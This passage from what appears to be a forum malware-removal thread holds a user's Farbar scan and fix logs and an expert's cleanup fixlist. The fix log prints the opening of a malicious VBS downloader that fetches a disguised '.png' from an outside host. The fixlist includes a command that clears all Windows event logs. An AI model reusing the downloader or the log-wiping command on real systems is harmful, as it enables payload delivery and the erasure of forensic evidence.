    Error: (02/01/2017 05:24:35 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
    Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
     
    Details:
    AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
     
    System Error:
    Access is denied.
    .
     
    Error: (02/01/2017 05:16:20 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
    Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
     
    Details:
    AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
     
    System Error:
    Access is denied.
    .
     
    Error: (02/01/2017 05:12:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
    Description: Activation of app Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
     
    Error: (02/01/2017 05:11:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.
     
    Error: (02/01/2017 05:09:22 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: IntelCpHDCPSvc.exe, version: 1.0.0.1, time stamp: 0x572a4b65
    Faulting module name: ntdll.dll, version: 10.0.14393.479, time stamp: 0x5825887f
    Exception code: 0xc0000005
    Fault offset: 0x000000000002f7db
    Faulting process id: 0xbbc
    Faulting application start time: 0x01d27cd7d151d8ae
    Faulting application path: C:\WINDOWS\system32\IntelCpHDCPSvc.exe
    Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
    Report Id: 3e6b982e-6b09-46dd-85b0-d82eba4dc172
    Faulting package full name: 
    Faulting package-relative application ID:
     
    Error: (02/01/2017 04:59:36 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: ShellExperienceHost.exe, version: 10.0.14393.447, time stamp: 0x5819bf85
    Faulting module name: twinapi.appcore.dll, version: 10.0.14393.206, time stamp: 0x57daca78
    Exception code: 0xc000027b
    Fault offset: 0x000000000006d1c4
    Faulting process id: 0x548
    Faulting application start time: 0x01d27cd53b391a9d
    Faulting application path: C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
    Faulting module path: C:\Windows\System32\twinapi.appcore.dll
    Report Id: 2e0a5a99-e912-4c25-a6aa-1c39d78550b5
    Faulting package full name: Microsoft.Windows.ShellExperienceHost_10.0.14393.693_neutral_neutral_cw5n1h2txyewy
    Faulting package-relative application ID: App
     
    Error: (02/01/2017 09:42:15 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
    Description: Activation of app Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
     
    Error: (02/01/2017 09:40:01 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.ShellExperienceHost_10.0.14393.693_neutral_neutral_cw5n1h2txyewy+App was terminated because it took too long to suspend.
     
    Error: (02/01/2017 09:32:01 AM) (Source: DPTF) (EventID: 256) (User: )
    Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR
     
    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
    Executing Function:  PolicyBase::takeControlOfOsc
    Message:  Failed to acquire OSC: Failure during execution of _OSC: 
    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
    Executing Function:  EsifServices::primitiveExecuteSet
    Message:  Error returned from ESIF services interface function call
    Participant:  NoParticipant
    Domain:  NoDomain
    ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
    ESIF Instance:  255
    ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
     
     
    Policy:  Passive Policy 2 [2]
     
     
    System errors:
    =============
    Error: (02/01/2017 05:45:07 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:45:03 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:59 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:55 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:51 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:47 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:43 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:39 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:32 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:28 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
     
    CodeIntegrity:
    ===================================
      Date: 2017-02-01 17:09:17.933
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
     
      Date: 2017-02-01 17:09:17.914
      Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
     
      Date: 2017-02-01 09:37:27.153
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
     
      Date: 2017-02-01 09:34:59.953
      Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
     
      Date: 2017-02-01 08:45:29.642
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
     
      Date: 2017-01-25 00:38:08.666
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
     
     
    ==================== Memory info =========================== 
     
    Processor: Intel® Core™ i7-6500U CPU @ 2.50GHz
    Percentage of memory in use: 21%
    Total physical RAM: 16273.91 MB
    Available physical RAM: 12742.12 MB
    Total Virtual: 18705.91 MB
    Available Virtual: 15116.4 MB
     
    ==================== Drives ================================
     
    Drive c: (Windows) (Fixed) (Total:913.93 GB) (Free:825.91 GB) NTFS
    Drive d: (RECOVERY) (Fixed) (Total:16.35 GB) (Free:1.88 GB) NTFS ==>[system with boot components (obtained from drive)]
    Drive e: (Disc1) (CDROM) (Total:1 GB) (Free:0 GB) UDF
     
    ==================== MBR & Partition Table ==================
     
    ========================================================
    Disk: 0 (Size: 931.5 GB) (Disk ID: D379171D)
     
    Partition: GPT.
     
    ==================== End of Addition.txt ============================
     
    Please let me know if you need any other info.
    Thank you!
     
     
     
     

    • 0

    #4
    RKinner

    RKinner

      Malware Expert

    • Expert
    • 20,031 posts
    • MVP

    You have a file:

     

    C:\Users\Joseph\AppData\Roaming\6ov.vbs

     

    I don't know what it does but it looks like it might be malware.  A google search doesn't turn up much but there is one site that indicates it's malware.

     

    https://www.hybrid-a...vironmentId=100

     

     It got on your PC on 1/20 

     

    Let's look at it and remove it with FRST.

     

     

     
    Download the attached fixlist.txt to the same location as FRST
     
    Attached File  fixlist.txt   1.13KB   22 downloads
     
    Run FRST and press Fix (this will cause a reboot)
    A fix log will be generated please post that 
     
     
    Run FRST again as before.  Make sure Addition.txt is checked and hit Scan.  Post both logs.
     
     
     

    • 0

    #5
    mw201

    mw201

      Member

    • Topic Starter
    • Member
    • PipPip
    • 15 posts

    here is the first fix  log:

     

     

    Fix result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
    Ran by Joseph (01-02-2017 21:13:44) Run:1
    Running from C:\Users\Joseph\Downloads
    Loaded Profiles: Joseph (Available Profiles: Joseph)
    Boot Mode: Normal
    ==============================================

    fixlist content:
    *****************
    CloseProcesses:
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    BHO: No Name -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> No File
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
    CMD: type C:\Users\Joseph\AppData\Roaming\6ov.vbs
    C:\Users\Joseph\AppData\Roaming\6ov.vbs
    CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-CF295C30B57B}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
    CMD: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
    *****************

    Processes closed successfully.
    HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => key removed successfully
    HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF} => key removed successfully
    HKCR\CLSID\{B4F3A835-0E21-4959-BA22-42B3008E02FF} => key not found.
    ibtsiva => Service stopped successfully.
    HKLM\System\CurrentControlSet\Services\ibtsiva => key removed successfully
    ibtsiva => service removed successfully

    ========= type C:\Users\Joseph\AppData\Roaming\6ov.vbs =========

    Dim drgfgd, jhgfsf  
    Set drgfgd = CreateObject("Microsoft.XMLHTTP")
    Set jhgfsf = CreateObject("Adodb.Stream")
    drgfgd.Open "GET", "http://disk.karelia....etBdl/996.png",False

    ========= End of CMD: =========

    C:\Users\Joseph\AppData\Roaming\6ov.vbs => moved successfully
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-CF295C30B57B} => key removed successfully

    ========= for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" =========

    Failed to clear log AirSpaceChannel. The requested operation cannot be performed over an enabled direct channel. The channel must first be disabled before performing the requested operation.
    Failed to clear log Intel-SST-CFD-HDA/IntelSST. The instance name passed was not recognized as valid by a WMI data provider.
    Failed to clear log Microsoft-Windows-LiveId/Analytic. Access is denied.
    Failed to clear log Microsoft-Windows-LiveId/Operational. Access is denied.
    Failed to clear log Microsoft-Windows-USBVideo/Analytic. The instance name passed was not recognized as valid by a WMI data provider.

    ========= End of CMD: =========



    The system needed a reboot.

    ==== End of Fixlog 21:16:45 ====


    • 0

    #6
    mw201

    mw201

      Member

    • Topic Starter
    • Member
    • PipPip
    • 15 posts

    here is the FRST

     

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-01-2017
    Ran by Joseph (administrator) on JOSEPHW (01-02-2017 21:30:42)
    Running from C:\Users\Joseph\Downloads
    Loaded Profiles: Joseph (Available Profiles: Joseph)
    Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe
    (Intel Corporation) C:\Windows\System32\igfxCUIService.exe
    (Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
    (Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
    (Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
    (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
    () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
    (HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    Failed to access process -> IntelCpHDCPSvc.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    (Intel Corporation) C:\Windows\System32\igfxEM.exe
    (Intel Corporation) C:\Windows\System32\igfxHK.exe
    (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
    (HP Development Company, L.P.) C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
    (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
    (Hewlett-Packard Co.) C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe
    (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
    (Hewlett-Packard Co.) C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
    (WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
    (HP Inc.) C:\Program Files\HPCommRecovery\HPCommRecovery.exe
    (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
    (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
    (Microsoft Corporation) C:\Windows\System32\smartscreen.exe
    (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
    (Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.693_none_42ff55c9655f38bf\TiWorker.exe

    ==================== Registry (Whitelisted) ====================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9181696 2017-01-13] (Realtek Semiconductor)
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
    HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27262432 2016-12-20] (Skype Technologies S.A.)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [HP Photosmart 6520 series (NET)] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
    HKU\S-1-5-18\...\RunOnce: [Application Restart #0] => C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe [371928 2016-07-16] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    Startup: C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-10-31]
    ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{f314d896-c550-4d14-b773-fdf73ec6770f}: [DhcpNameServer] 192.168.1.1

    Internet Explorer:
    ==================
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-12-28] (Microsoft Corporation)
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-12-28] (Microsoft Corporation)
    BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
    Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)

    FireFox:
    ========
    FF DefaultProfile: y2l2kxa2.default
    FF ProfilePath: C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default [2017-02-01]
    FF Extension: (Adblock Plus) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-01]
    FF Extension: (Diagnostics) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{ed517155-4b2e-41a9-a11a-b6c004d1e42b}\[email protected] [2017-02-01]
    FF Extension: (Send HSTS Priming Requests) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{ed517155-4b2e-41a9-a11a-b6c004d1e42b}\[email protected] [2017-02-01]
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-01-19]
    FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [not signed]
    FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
    FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
    FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2016-09-05] (Citrix Systems, Inc.)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-12-28] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
